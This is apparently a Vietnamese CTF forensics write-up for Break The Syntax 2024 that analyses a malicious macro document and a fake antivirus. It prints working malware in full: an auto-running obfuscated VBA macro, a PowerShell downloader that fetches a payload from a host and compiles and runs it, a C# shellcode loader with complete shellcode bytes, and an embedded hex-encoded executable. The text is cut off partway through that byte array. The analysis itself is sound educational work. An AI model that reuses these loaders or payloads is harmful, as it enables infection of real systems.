Post

Break The Syntax 2024

Posted Updated
Preview Image
By tr0n9_t4m 15 min read

Challenge được lưu -> tại đây

Free_flag

Description

I think someone just logged in to my computer

Solution

  • Bài này cho ta 1 file pcapng.

  • Mở nó lên với wireshark. Thứ đập vào mắt ta đầu tiên là 1 file docm chứa macro.

  • image
  • Export nó về và dùng olevba để kiểm tra ta được 1 đoạn macro bị Obfuscator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

Function XUX8BlCUMq5KoK8(lXKWfCUl1zmltYi() As Byte) As Byte()
    Dim EMtQJsAKYNXvFOd() As Byte
    ReDim EMtQJsAKYNXvFOd(UBound(lXKWfCUl1zmltYi))
    Dim nF7o4G7ab45k7fe(4) As Byte
    nF7o4G7ab45k7fe(0) = 222
    nF7o4G7ab45k7fe(1) = 173
    nF7o4G7ab45k7fe(2) = 190
    nF7o4G7ab45k7fe(3) = 239
    Dim HSnocyKymDfeVtw As Long
    For HSnocyKymDfeVtw = LBound(lXKWfCUl1zmltYi) To UBound(lXKWfCUl1zmltYi)
        EMtQJsAKYNXvFOd(HSnocyKymDfeVtw) = lXKWfCUl1zmltYi(HSnocyKymDfeVtw) Xor nF7o4G7ab45k7fe(HSnocyKymDfeVtw Mod 4) Xor &HBB
    Next HSnocyKymDfeVtw
    XUX8BlCUMq5KoK8 = EMtQJsAKYNXvFOd
End Function

Function BBjijsT7pS60iwZ(str As String) As Byte()
    Dim nrKM9I07nhiFKOO() As String
    Dim GHebfca2sCJaoCG() As Byte
    Dim vgrs5jtmF1aXSJF As Long
    nrKM9I07nhiFKOO = Split(str, ",")
    ReDim GHebfca2sCJaoCG(LBound(nrKM9I07nhiFKOO) To UBound(nrKM9I07nhiFKOO))
    For vgrs5jtmF1aXSJF = LBound(nrKM9I07nhiFKOO) To UBound(nrKM9I07nhiFKOO)
        GHebfca2sCJaoCG(vgrs5jtmF1aXSJF) = CByte(Trim(nrKM9I07nhiFKOO(vgrs5jtmF1aXSJF)))
    Next vgrs5jtmF1aXSJF

    BBjijsT7pS60iwZ = GHebfca2sCJaoCG
End Function

Sub AutoOpen()
Dim TP2lyf5wJk5RfdK As InlineShape
Set TP2lyf5wJk5RfdK = ActiveDocument.InlineShapes(1)
Dim ovVApsD7tsHJaAV() As Byte
ovVApsD7tsHJaAV = BBjijsT7pS60iwZ(TP2lyf5wJk5RfdK.AlternativeText)
KKPSYRKShOsPgGt = XUX8BlCUMq5KoK8(ovVApsD7tsHJaAV)
Dim txsptBa4S5TwPSY As String
txsptBa4S5TwPSY = StrConv(KKPSYRKShOsPgGt, vbUnicode)
Dim o4LCufGQYESakcZ As Object
Set o4LCufGQYESakcZ = CreateObject("WScript.Shell")
o4LCufGQYESakcZ.Run txsptBa4S5TwPSY, 0, True
MsgBox "BtSCTF{LEGIT_FREE_FLAG_OMG}"
End Sub
  • Sử dụng AI để sửa các biến lại cho dễ đọc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

Function DecodeByteArray(inputArray() As Byte) As Byte()
    Dim decodedArray() As Byte
    ReDim decodedArray(UBound(inputArray))
    Dim xorKey(4) As Byte
    xorKey(0) = 222
    xorKey(1) = 173
    xorKey(2) = 190
    xorKey(3) = 239
    Dim i As Long
    For i = LBound(inputArray) To UBound(inputArray)
        decodedArray(i) = inputArray(i) Xor xorKey(i Mod 4) Xor &HBB
    Next i
    DecodeByteArray = decodedArray
End Function

Function StringToByteArray(inputString As String) As Byte()
    Dim stringArray() As String
    Dim byteArray() As Byte
    Dim i As Long
    stringArray = Split(inputString, ",")
    ReDim byteArray(LBound(stringArray) To UBound(stringArray))
    For i = LBound(stringArray) To UBound(stringArray)
        byteArray(i) = CByte(Trim(stringArray(i)))
    Next i
    StringToByteArray = byteArray
End Function

Sub AutoOpen()
    Dim image As InlineShape
    Set image = ActiveDocument.InlineShapes(1)
    Dim byteArray() As Byte
    byteArray = StringToByteArray(image.AlternativeText)
    decodedData = DecodeByteArray(byteArray)
    Dim decodedString As String
    decodedString = StrConv(decodedData, vbUnicode)
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run decodedString, 0, True
    MsgBox "BtSCTF{LEGIT_FREE_FLAG_OMG}"
End Sub
  • Ta có thể thấy rõ ràng rằng tập tin này đang thực thi 1 đoạn string bằng WScript.Shell
  • Thay vì phân tích mã, mình sẽ thực hiện phân tích động thông qua https://app.any.run/ để tiết kiệm thời gian
  • image
1

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-Command -ScriptBlock {$6gYiBaJnTQcMARy = \"192.168.56.1\";$DBFwswhgYKnCwxJ = (123974 - 152030 + 28874 + 519);$GPmlM4I7LVSUO9t = (\"{3}{1}{4}{5}{0}{2}\"-f'd5','d9','d2','d9','de','c9');$98UxWBU8aY4OJFJ = [System.Text.Encoding]::UTF8;function MB9ERVf9riNRmuw {param ([byte[]] $tjjm1xYg4zJinVI);$DXRDV3GJeE7gone = New-Object byte[] $tjjm1xYg4zJinVI.Length;$t5wJRYluj7d0ieV = 13;for ($UGDhhObqc1FJ1Vk = 0; $UGDhhObqc1FJ1Vk -lt $tjjm1xYg4zJinVI.Length;$UGDhhObqc1FJ1Vk++) {$DXRDV3GJeE7gone[$UGDhhObqc1FJ1Vk] = $tjjm1xYg4zJinVI[$UGDhhObqc1FJ1Vk] -bxor $t5wJRYluj7d0ieV;$t5wJRYluj7d0ieV = $t5wJRYluj7d0ieV -bxor 37 -bxor ($UGDhhObqc1FJ1Vk % 0xBB) };return $DXRDV3GJeE7gone};[byte[]] $FFpqmSFabhns282 = 67,58,92,87,105,110,100,111,119,115,92,77,105,99,114,111,115,111,102,116,46,78,69,84,92,70,114,97,109,101,119,111,114,107;$XqpH6qchzQzxaIl = (gci ($98UxWBU8aY4OJFJ.GetString($FFpqmSFabhns282)) -R -Fi (\"{4}{6}{1}{3}{5}{2}{0}\" -f 'e','c','x','.','c','e','s'));if ($null -eq $XqpH6qchzQzxaIl.Exists) {exit} else {$XqpH6qchzQzxaIl = $XqpH6qchzQzxaIl.FullName};$TYVxBiSN7LYP1B3 = (iwr \"${6gYiBaJnTQcMARy}:${DBFwswhgYKnCwxJ}/${GPmlM4I7LVSUO9t}\" -UseBasicParsing).Content;$TYVxBiSN7LYP1B3 = MB9ERVf9riNRmuw $TYVxBiSN7LYP1B3;$6fNCDEaFmB9lcOg = \"${Env:TEMP}\ea98cjme\";$FbPIDO60oanqD7k = \"/out:${Env:TEMP}\ea98cjme.exe\";Set-Content -Path $6fNCDEaFmB9lcOg -Value $TYVxBiSN7LYP1B3 -Encoding Byte -NoNewline;& $XqpH6qchzQzxaIl $FbPIDO60oanqD7k $6fNCDEaFmB9lcOg;& \"${Env:TEMP}\ea98cjme.exe\";rm $6fNCDEaFmB9lcOg}"
  • Nó lại bị Obfuscator, ta sử dụng công cụ PowerDecode và AI để sửa lại mã cho dễ đọc
  • Và đây là mã đã được sửa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40


$serverIP = "192.168.56.1"
$calculatedValue = (123974 - 15203028874519)
$encodedString = 'ded5c9d9d9d2'
$encoding = [System.Text.Encoding]::UTF8

function DecryptData { 
    param ([byte[]] $inputData)
    
    $outputData = New-Object byte[] $inputData.Length
    $xorValue = 13
    
    for ($index = 0; $index -lt $inputData.Length; $index++) {
        $outputData[$index] = $inputData[$index] -bxor $xorValue
        $xorValue = $xorValue -bxor 37 -bxor ($index % 0xBB)
    }
    
    return $outputData
}

[byte[]] $byteArray = 67,58,92,87,105,110,100,111,119,115,92,77,105,99,114,111,115,111,102,116,46,78,69,84,92,70,114,97,109,101,119,111,114,107
$exePath = (gci ($encoding.GetString($byteArray)) -R -Fi 'csc.exe')

if ($null -eq $exePath.Exists) {
    exit 
} else {
    $exePath = $exePath.FullName
}

$webContent = (iwr '${serverIP}:${calculatedValue}/${encodedString}' -UseBasicParsing).Content
$webContent = DecryptData $webContent

$tempFilePath = '${Env:TEMP}\ea98cjme'
$outputExePath = '/out:${Env:TEMP}\ea98cjme.exe'

Set-Content -Path $tempFilePath -Value $webContent -Encoding Byte -NoNewline
& $exePath $outputExePath $tempFilePath
& '${Env:TEMP}\ea98cjme.exe'
rm $tempFilePath
  • Đọc src ta thấy nó tải xuống 1 file từ ip và port cho sẵn, sau đó decrypt và lưu với file exe.
  • Đối với file tải xuống nó đã được capture bởi file pcapng đã cho.
  • image
  • Bây giờ ta viết 1 script nhỏ để xem sau khi decrypt chúng có gì
1
2
3
4
5
6
7
8

with open("d9d9dec9d5d2", "rb") as file:
    data = file.read() 
xorvalue = 13
outdata = bytearray() 
for i in range(len(data)):
    outdata.append(data[i] ^ xorvalue)
    xorvalue = xorvalue ^ 37 ^ (i % 0xBB)
print(outdata)
  • Và đây là đầu ra
1

bytearray(b'using System;\r\nusing System.Runtime.InteropServices;\r\n\r\nclass Program\r\n{\r\n    [DllImport("kernel32.dll", SetLastError = true)]\r\n    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n    [DllImport("kernel32.dll")]\r\n    public static extern bool VirtualFree(IntPtr lpAddress, uint dwSize, uint dwFreeType);\r\n    [DllImport("kernel32.dll")]\r\n    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);\r\n    [DllImport("kernel32.dll")]\r\n    public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);\r\n    public static void Main()\r\n    {\r\n        byte[] buf = new byte[] {0xd9,0xec,0xbb,0xe9,0xaf,0xc8,0xb5,0xd9,0x74,0x24,0xf4,0x5f,0x33,0xc9,0xb1,0x87,0x31,0x5f,0x1a,0x83,0xc7,0x04,0x03,0x5f,0x16,0xe2,0x1c,0x74,0x1b,0x6c,0xaa,0xaf,0x68,0x37,0x99,0x35,0x23,0x7f,0x43,0x05,0x8d,0x31,0xfa,0x58,0x4b,0x25,0xff,0xdc,0x44,0xca,0xda,0x99,0x3b,0x0e,0x44,0x32,0xf3,0xd7,0x32,0x5b,0xc0,0xc1,0x1b,0x73,0x18,0x67,0x3f,0xf2,0x18,0x75,0xf8,0x25,0xbc,0x04,0x61,0xf3,0xe4,0xd5,0x95,0x58,0x7f,0x02,0x31,0x14,0xe9,0xa0,0xe0,0x01,0x43,0xaa,0xb6,0xd1,0xb7,0xae,0xd4,0x58,0xdd,0xb3,0x96,0x0c,0x26,0xfc,0xb5,0xbd,0xa3,0x15,0x58,0xe2,0xf9,0x3a,0x85,0x06,0xc7,0x16,0x86,0xe6,0x06,0x7a,0x45,0x69,0x8d,0xb2,0x29,0x69,0x23,0xd9,0xac,0x22,0xaf,0x70,0x03,0x7c,0x9c,0x68,0x1d,0x5f,0x86,0x97,0xc6,0x0b,0xd7,0x30,0x2e,0xab,0x22,0x85,0x02,0xc8,0x61,0xea,0xa4,0xf8,0x8d,0x5e,0xa4,0x42,0x07,0x69,0xd6,0x8f,0x60,0x78,0x64,0x98,0xcd,0x4b,0x24,0xcc,0x31,0x7a,0xaa,0xea,0x55,0x2e,0xe1,0x5b,0xec,0x07,0x59,0x2c,0xc5,0x02,0x17,0x74,0x55,0x34,0xf7,0xf5,0xd1,0xe7,0xb5,0xa1,0x65,0x2e,0x3b,0x6b,0x9c,0xc7,0xde,0xc4,0xf3,0x63,0xd5,0x7f,0x2b,0x59,0xf3,0x34,0xdb,0x14,0xe4,0x85,0xb7,0x20,0x3d,0x5d,0xc0,0xff,0x55,0x20,0xc7,0x28,0x92,0x9f,0xe0,0x61,0x89,0xa0,0x89,0x4b,0x65,0xf6,0x8b,0xda,0xf5,0xde,0x7c,0x87,0x14,0x55,0xf2,0xfd,0x11,0xf4,0xa5,0x1c,0x32,0x55,0xcf,0x38,0x23,0x99,0xc6,0x37,0x28,0x8d,0xfa,0x93,0xa4,0x87,0x18,0x2a,0xfc,0x36,0x65,0x1b,0xea,0x95,0x5b,0xcc,0xd7,0x33,0x4a,0x96,0x84,0x85,0x15,0x4a,0x8f,0xac,0xeb,0xe6,0x73,0x94,0xa2,0x42,0x8e,0xc8,0x85,0x1e,0x38,0x5e,0x86,0x39,0x8a,0x15,0xc9,0xdc,0x96,0xbc,0x53,0xdc,0x3a,0xda,0x3b,0x5a,0x83,0x00,0x74,0x0e,0xa5,0x58,0xf1,0x3d,0xe8,0x79,0xed,0xc0,0x1a,0xaf,0x13,0xb4,0x26,0x76,0xae,0xb5,0x1f,0x95,0x41,0x11,0x7a,0x2b,0x7a,0xcf,0x12,0xad,0x10,0x4a,0xce,0xea,0x64,0xbb,0x98,0x3e,0x28,0x40,0x55,0x2d,0x72,0x3b,0x5e,0x6c,0x75,0xaa,0xab,0x37,0x9d,0xc2,0x77,0x81,0x8e,0x0c,0x96,0x4c,0xde,0x30,0xaf,0x1b,0xa9,0x78,0xee,0x3e,0xca,0x55,0x52,0x05,0x10,0x01,0xe2,0xad,0x8e,0x0a,0xee,0x15,0x57,0xa3,0xb3,0x1a,0x5d,0xec,0x6a,0x31,0x28,0x68,0x7a,0x1f,0x77,0x96,0xac,0x33,0x5a,0xcd,0x5b,0x23,0x83,0xb0,0xba,0x18,0xed,0xa8,0x26,0xe8,0x93,0x09,0x46,0x22,0xaf,0x11,0x90,0xe9,0xf1,0xaf,0xf9,0x79,0x1b,0x2e,0xd6,0x5d,0x22,0xa8,0x50,0x1f,0x54,0x0e,0x87,0x63,0x7e,0x3d,0xe6,0x3f,0x6b,0xe6,0xff,0x67,0xe6,0x02,0x85,0xca,0x27,0xe9,0xe0,0xe3,0xd8,0x76,0xcb,0x8f,0x5b,0xe2,0xbb,0x88,0x05,0xce,0xb2,0xed,0xfb,0xea,0x5f,0x7c,0x5a,0x71,0x31,0x25,0xac,0x42,0x6f,0x1f,0xdb,0x9b,0x34,0x43,0x58,0x2b,0xd8,0x32,0x2c,0x20,0x45,0x4f,0x9e,0xc4,0x54,0xe4,0xe7,0xee,0x8b,0xab,0x98,0xef,0x06,0x4d,0x12,0x90,0xb4,0xb7,0xc0,0x81,0x68,0x83,0xdb,0x07,0x0c,0x00,0x10,0x8e,0x3c,0x48,0xd0,0x07,0xb2,0x78,0x72,0x92,0x76,0x65,0x64,0x24,0x78,0xa8,0x8a,0xf8,0x52,0x7d,0xff,0x43,0xdd,0x7f,0xb6,0x20,0xd2,0xac,0xa8,0xd6,0x30,0xfe,0x5d,0x51,0xf5,0x21,0x34,0x5b,0xab,0xfc,0xd9,0x43,0x5d,0xb2,0x79,0x0c,0xa8,0xc6,0x5c,0xc3,0x39,0xef,0x3a,0xb7};\r\n        IntPtr allocMemAddress = VirtualAlloc(IntPtr.Zero, (uint)buf.Length, 0x1000 | 0x2000, 0x40);\r\n        Marshal.Copy(buf, 0, allocMemAddress, buf.Length);\r\n        uint threadId;\r\n        IntPtr hThread = CreateThread(IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, out threadId);\r\n        WaitForSingleObject(hThread, 0xFFFFFFFF);\r\n    }\r\n}')
  • Tuy file đã bị chuyển dang dạng byte nhưng ta vẫn có thể thấy được, dòng lệnh này đang tiếp hành tạo 1 file shellcode bằng chuỗi hex.
  • Bây giờ ta tiến hành lấy file shellcode ra và debug bằng công cụ scdbg
  • image
  • image

Flag : BtSCTF{VbA_+P0wer5h3ll=_<3!!!}

BTS_Antivirus

Description

I realised that something was wrong with that free flag document, so I decided to download an antivirus. It worked well - maybe too well, because it seems to have encrypted all my files. I don’t really know how to feel about that - maybe it’s for security. I’ve captured internet traffic and created a memory dump of the antivirus process. Can you analyze what it really did?

Solution

  • Bài này cho ta 2 file: 1 file pcapng và 1 file DMP được dump từ tiến trình đang chạy.
  • Ta tiến hành phân tích file pcapng trước
  • image
  • Ở đây, ta thấy rằng có 1 file powershell ở đây.
  • Bây giờ ta xem src nó xem có gì
1

$sb = { [byte[]] $data = 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4c,0x01,0x03,0x00,0x94,0xea,0xe8,0xa9,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x00,0x22,0x20,0x0b,0x01,0x30,0x00,0x00,0x16,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x1a,0x34,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x20,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x60,0x85,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc8,0x33,0x00,0x00,0x4f,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x70,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x0c,0x00,0x00,0x00,0xec,0x32,0x00,0x00,0x54,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x20,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x20,0x14,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x16,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,0x2e,0x72,0x73,0x72,0x63,0x00,0x00,0x00,0x70,0x03,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0x33,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x02,0x00,0x05,0x00,0xa8,0x23,0x00,0x00,0x44,0x0f,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1b,0x30,0x03,0x00,0x42,0x00,0x00,0x00,0x01,0x00,0x00,0x11,0x00,0x73,0x0f,0x00,0x00,0x0a,0x0a,0x06,0x03,0x17,0x73,0x10,0x00,0x00,0x0a,0x0b,0x07,0x73,0x11,0x00,0x00,0x0a,0x0c,0x08,0x02,0x6f,0x12,0x00,0x00,0x0a,0x00,0xde,0x0b,0x08,0x2c,0x07,0x08,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x06,0x6f,0x14,0x00,0x00,0x0a,0x0d,0xde,0x0b,0x07,0x2c,0x07,0x07,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x09,0x2a,0x00,0x00,0x01,0x1c,0x00,0x00,0x02,0x00,0x17,0x00,0x0a,0x21,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,0x00,0x10,0x00,0x25,0x35,0x00,0x0b,0x00,0x00,0x00,0x00,0x1b,0x30,0x03,0x00,0x39,0x00,0x00,0x00,0x02,0x00,0x00,0x11,0x00,0x02,0x73,0x15,0x00,0x00,0x0a,0x0a,0x06,0x03,0x16,0x73,0x10,0x00,0x00,0x0a,0x0b,0x07,0x73,0x16,0x00,0x00,0x0a,0x0c,0x08,0x6f,0x17,0x00,0x00,0x0a,0x0d,0xde,0x16,0x08,0x2c,0x07,0x08,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x07,0x2c,0x07,0x07,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x09,0x2a,0x00,0x00,0x00,0x01,0x1c,0x00,0x00,0x02,0x00,0x18,0x00,0x09,0x21,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,0x00,0x11,0x00,0x1b,0x2c,0x00,0x0b,0x00,0x00,0x00,0x00,0x1b,0x30,0x05,0x00,0x67,0x01,0x00,0x00,0x03,0x00,0x00,0x11,0x00,0x28,0x18,0x00,0x00,0x0a,0x0a,0x7e,0x02,0x00,0x00,0x04,0x25,0x2d,0x17,0x26,0x7e,0x01,0x00,0x00,0x04,0xfe,0x06,0x08,0x00,0x00,0x06,0x73,0x19,0x00,0x00,0x0a,0x25,0x80,0x02,0x00,0x00,0x04,0x28,0x1a,0x00,0x00,0x0a,0x00,0x06,0x73,0x1b,0x00,0x00,0x0a,0x72,0x01,0x00,0x00,0x70,0x28,0x1c,0x00,0x00,0x0a,0x6f,0x1d,0x00,0x00,0x0a,0x00,0x06,0x28,0x1e,0x00,0x00,0x0a,0x72,0x45,0x00,0x00,0x70,0x6f,0x1f,0x00,0x00,0x0a,0x6f,0x20,0x00,0x00,0x0a,0x00,0x06,0x17,0x6f,0x21,0x00,0x00,0x0a,0x00,0x06,0x06,0x6f,0x22,0x00,0x00,0x0a,0x06,0x6f,0x23,0x00,0x00,0x0a,0x6f,0x24,0x00,0x00,0x0a,0x0b,0x06,0x06,0x6f,0x22,0x00,0x00,0x0a,0x06,0x6f,0x23,0x00,0x00,0x0a,0x6f,0x25,0x00,0x00,0x0a,0x0c,0x72,0x67,0x00,0x00,0x70,0x20,0xb8,0x22,0x00,0x00,0x73,0x26,0x00,0x00,0x0a,0x0d,0x09,0x6f,0x27,0x00,0x00,0x0a,0x13,0x04,0x20,0x00,0x10,0x00,0x00,0x8d,0x29,0x00,0x00,0x01,0x13,0x05,0x00,0x2b,0x63,0x00,0x11,0x04,0x11,0x05,0x16,0x11,0x05,0x8e,0x69,0x6f,0x28,0x00,0x00,0x0a,0x13,0x06,0x11,0x05,0x11,0x06,0x28,0x01,0x00,0x00,0x2b,0x28,0x02,0x00,0x00,0x2b,0x08,0x28,0x02,0x00,0x00,0x06,0x13,0x07,0x11,0x07,0x28,0x04,0x00,0x00,0x06,0x13,0x08,0x11,0x08,0x07,0x28,0x01,0x00,0x00,0x06,0x13,0x09,0x11,0x09,0x8e,0x69,0x28,0x2b,0x00,0x00,0x0a,0x13,0x0a,0x11,0x04,0x11,0x0a,0x11,0x09,0x28,0x03,0x00,0x00,0x2b,0x28,0x02,0x00,0x00,0x2b,0x16,0x11,0x09,0x8e,0x69,0x1a,0x58,0x6f,0x2d,0x00,0x00,0x0a,0x00,0x00,0x17,0x13,0x0b,0x2b,0x98,0x13,0x0c,0x00,0x11,0x04,0x28,0x1e,0x00,0x00,0x0a,0x11,0x0c,0x6f,0x2e,0x00,0x00,0x0a,0x6f,0x1f,0x00,0x00,0x0a,0x16,0x11,0x0c,0x6f,0x2e,0x00,0x00,0x0a,0x6f,0x2f,0x00,0x00,0x0a,0x6f,0x2d,0x00,0x00,0x0a,0x00,0x00,0xde,0x00,0xde,0x23,0x11,0x04,0x2c,0x08,0x11,0x04,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x09,0x2c,0x07,0x09,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x06,0x2c,0x07,0x06,0x6f,0x13,0x00,0x00,0x0a,0x00,0xdc,0x2a,0x00,0x41,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0xaa,0x00,0x00,0x00,0x6b,0x00,0x00,0x00,0x15,0x01,0x00,0x00,0x2c,0x00,0x00,0x00,0x18,0x00,0x00,0x01,0x02,0x00,0x00,0x00,0x9e,0x00,0x00,0x00,0xa5,0x00,0x00,0x00,0x43,0x01,0x00,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x96,0x00,0x00,0x00,0xba,0x00,0x00,0x00,0x50,0x01,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x54,0x01,0x00,0x00,0x5b,0x01,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x13,0x30,0x06,0x00,0x71,0x00,0x00,0x00,0x04,0x00,0x00,0x11,0x00,0x73,0x30,0x00,0x00,0x0a,0x25,0x73,0x31,0x00,0x00,0x0a,0x25,0x72,0x81,0x00,0x00,0x70,0x6f,0x32,0x00,0x00,0x0a,0x00,0x25,0x72,0x9f,0x00,0x00,0x70,0x02,0x28,0x33,0x00,0x00,0x0a,0x6f,0x34,0x00,0x00,0x0a,0x00,0x25,0x17,0x6f,0x35,0x00,0x00,0x0a,0x00,0x25,0x16,0x6f,0x36,0x00,0x00,0x0a,0x00,0x25,0x17,0x6f,0x37,0x00,0x00,0x0a,0x00,0x25,0x17,0x6f,0x38,0x00,0x00,0x0a,0x00,0x6f,0x39,0x00,0x00,0x0a,0x00,0x0a,0x06,0x6f,0x3a,0x00,0x00,0x0a,0x26,0x06,0x6f,0x3b,0x00,0x00,0x0a,0x6f,0x17,0x00,0x00,0x0a,0x0b,0x06,0x6f,0x3c,0x00,0x00,0x0a,0x00,0x07,0x0c,0x2b,0x00,0x08,0x2a,0x22,0x02,0x28,0x3d,0x00,0x00,0x0a,0x00,0x2a,0x2e,0x73,0x07,0x00,0x00,0x06,0x80,0x01,0x00,0x00,0x04,0x2a,0x22,0x02,0x28,0x3d,0x00,0x00,0x0a,0x00,0x2a,0x00,0x13,0x30,0x01,0x00,0x07,0x00,0x00,0x00,0x05,0x00,0x00,0x11,0x00,0x17,0x0a,0x2b,0x00,0x06,0x2a,0x00,0x42,0x53,0x4a,0x42,0x01,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x76,0x34,0x2e,0x30,0x2e,0x33,0x30,0x33,0x31,0x39,0x00,0x00,0x00,0x00,0x05,0x00,0x6c,0x00,0x00,0x00,0x08,0x05,0x00,0x00,0x23,0x7e,0x00,0x00,0x74,0x05,0x00,0x00,0xc4,0x06,0x00,0x00,0x23,0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00,0x00,0x00,0x00,0x38,0x0c,0x00,0x00,0xb4,0x00,0x00,0x00,0x23,0x55,0x53,0x00,0xec,0x0c,0x00,0x00,0x10,0x00,0x00,0x00,0x23,0x47,0x55,0x49,0x44,0x00,0x00,0x00,0xfc,0x0c,0x00,0x00,0x48,0x02,0x00,0x00,0x23,0x42,0x6c,0x6f,0x62,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x01,0x57,0x15,0x02,0x00,0x09,0x0a,0x00,0x00,0x00,0xfa,0x01,0x33,0x00,0x16,0x00,0x00,0x01,0x00,0x00,0x00,0x2e,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x09,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0x12,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x09,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x54,0x03,0x01,0